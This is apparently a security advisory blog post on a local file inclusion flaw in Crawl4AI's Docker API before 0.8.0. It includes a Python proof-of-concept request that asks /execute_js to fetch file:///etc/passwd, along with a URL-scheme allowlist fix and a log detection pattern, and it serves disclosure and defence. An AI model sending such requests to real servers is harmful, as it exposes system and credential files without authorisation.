Crawl4AI: When Web Scrapers Become File Servers
Jan 17, 2026 · 5 min read
Executive Summary (TL;DR)
The Crawl4AI Docker API accepted any URL scheme, including `file://`. Attackers could use endpoints like `/execute_js` to read sensitive local files (like `/etc/passwd` or environment variables) simply by asking the crawler to 'visit' them. This is a classic Local File Inclusion (LFI) vulnerability fixed in version 0.8.0.
Crawl4AI, a popular tool for making web content LLM-friendly, inadvertently exposed a massive hole in its Docker API. By failing to validate URL schemes, it allowed unauthenticated attackers to use the `file://` protocol to read local files from the server, turning a useful scraper into a highly effective data exfiltration tool.
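The attack described above can be sketched as a single API request. This is a hedged proof-of-concept sketch, not the published PoC: the `/execute_js` endpoint comes from the article, while the port and JSON field names are illustrative assumptions.

```python
# Hedged PoC sketch: asks a vulnerable Crawl4AI Docker API (< 0.8.0) to
# "crawl" a local file via the file:// scheme. The endpoint name follows
# the article; the port and payload field names are assumptions.
import json
import urllib.request

API = "http://localhost:11235/execute_js"  # assumed Docker port

payload = {
    "url": "file:///etc/passwd",  # file:// scheme accepted pre-0.8.0
    "scripts": ["return document.body.innerText"],
}

req = urllib.request.Request(
    API,
    data=json.dumps(payload).encode(),
    headers={"Content-Type": "application/json"},
)
# On a vulnerable instance, the response body would contain the
# contents of /etc/passwd. Uncomment to send the request:
# with urllib.request.urlopen(req) as resp:
#     print(resp.read().decode())
```

Because the API required no authentication, any host that could reach the Docker port could issue this request.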
Official Patches
Technical Appendix
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:N/A:N
Affected Systems
Affected Versions Detail
| Product | Affected Versions | Fixed Version |
|---|---|---|
| unclecode/crawl4ai | < 0.8.0 | 0.8.0 |
| Attribute | Detail |
|---|---|
| Attack Vector | Network (API) |
| CVSS | 8.6 (High) |
| CWE | CWE-22 (Path Traversal) |
| Privileges | None (Unauthenticated) |
| Impact | High Confidentiality (File Read) |
| Exploit Status | Functional PoC Available |
MITRE ATT&CK Mapping
CWE-22 (Improper Limitation of a Pathname to a Restricted Directory): the software uses external input to construct a pathname intended to identify a file or directory underneath a restricted parent directory, but does not properly neutralize special elements within the pathname, allowing it to resolve to a location outside the restricted directory.
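The root cause was the absence of a URL-scheme check before fetching. The sketch below shows the kind of allowlist validation that closes this class of bug; it is a minimal illustration, and the actual 0.8.0 patch may be implemented differently.

```python
# Hedged sketch of a scheme-allowlist check (not the literal 0.8.0 patch):
# reject any URL whose scheme is not http or https before the crawler
# is allowed to fetch it.
from urllib.parse import urlparse

ALLOWED_SCHEMES = {"http", "https"}

def validate_url(url: str) -> str:
    """Return the URL unchanged, or raise ValueError for blocked schemes."""
    scheme = urlparse(url).scheme.lower()
    if scheme not in ALLOWED_SCHEMES:
        raise ValueError(f"blocked URL scheme: {scheme!r}")
    return url

validate_url("https://example.com/page")  # passes
# validate_url("file:///etc/passwd")      # raises ValueError
```

Checking the scheme at the API boundary, rather than inside the crawler, keeps every endpoint (`/execute_js` included) behind the same guard.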
Known Exploits & Detection
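For defenders, one simple detection approach is to scan API access or request-body logs for non-HTTP(S) URL schemes, which should never appear in legitimate crawl requests. This is a generic sketch; the log format shown is an illustrative assumption, not Crawl4AI's actual log layout.

```python
# Hedged detection sketch: flag log lines containing URL schemes that a
# legitimate crawl request would never use. Log format is an assumption.
import re

SUSPICIOUS = re.compile(r"\b(?:file|ftp|gopher|dict)://", re.IGNORECASE)

def flag_suspicious(lines):
    """Return log lines containing suspicious URL schemes."""
    return [line for line in lines if SUSPICIOUS.search(line)]

logs = [
    'POST /execute_js {"url": "https://example.com"}',
    'POST /execute_js {"url": "file:///etc/passwd"}',
]
flag_suspicious(logs)  # flags only the file:// request
```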
Vulnerability Timeline